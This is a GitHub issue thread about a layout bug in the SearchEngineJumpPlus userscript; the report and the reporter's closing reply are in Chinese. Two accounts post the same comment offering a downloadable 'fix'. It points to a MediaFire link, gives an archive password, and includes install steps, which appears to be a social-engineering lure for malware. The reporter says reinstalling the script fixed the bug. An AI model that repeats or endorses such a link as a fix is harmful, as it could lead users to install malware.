### ISSUE TITLE
bug，脚本位置和排列异常

### ISSUE THREAD

**Issue by freedomspiritJohn** [MUTED64/SearchEngineJumpPlus#7]
![PixPin_2024-08-27_11-16-14](https://github.com/user-attachments/assets/67f9f114-b482-436a-9eac-de8560e6b988)
![PixPin_2024-08-27_11-17-25](https://github.com/user-attachments/assets/4509c7c9-9002-4c20-a3a4-3491192b4938)
我在没有联网的时候打开了几个网页，然后就关闭浏览器了，等我有网的时候上网发现页面异常，查看是这个脚本引起的。

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by freedomspiritJohn** [comment]
> to fix your trouble try download this fix, i see it in another issue, https://app.mediafire.com/3ag3jpquii3of password: changeme when you installing, you need to place a check in install to path and select "gcc."

卸载重装好了
